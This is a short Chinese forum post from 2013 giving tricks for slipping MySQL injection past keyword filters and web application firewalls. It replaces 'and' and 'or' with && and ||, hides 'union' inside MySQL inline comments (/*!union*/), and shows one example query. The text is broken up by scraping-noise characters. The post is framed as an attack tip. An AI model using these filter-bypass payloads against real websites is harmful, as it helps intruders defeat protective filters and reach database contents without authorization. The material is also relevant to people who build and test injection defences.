找回密码
 立即注册
查看: 2620|回复: 0
打印 上一主题 下一主题

mysql注入对and or的过滤及uinon select等过滤的一个方法突破

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-23 12:41:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
1.and 用&& 代替
, d& j$ T3 b# X) j! g: m; i! u$ y3 P9 }8 w& R, Q
2. or 用||代替
: u  D! z  |8 ]! c4 Z( F
; ^" c9 c5 I" L: ?  K' y/ V+ o0 l3.union select from 变成 /*!union*/这种。
0 R1 i# d7 x2 ^+ S
  Q& ]% o: _' \5 a) {9 ?0 ?- N一个例子:
. p/ }' ~, y$ L( Z5 j
2 l6 z# ~% s: y& f( g/ select 1 /*!union*/ select 2 from adad where 1&&1
) H8 J3 F2 J" p9 f# {) O7 T" n* b8 f, ^4 M0 h2 n$ Y
摘自 it_security
" t9 y9 u7 c. |3 o* ]+ z
1 E  M' c5 V1 R( g5 r绕过waf的一个思路2 }  q; O% _8 M5 Y: Q  V$ \

# O9 ]" i4 |1 |2 H
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表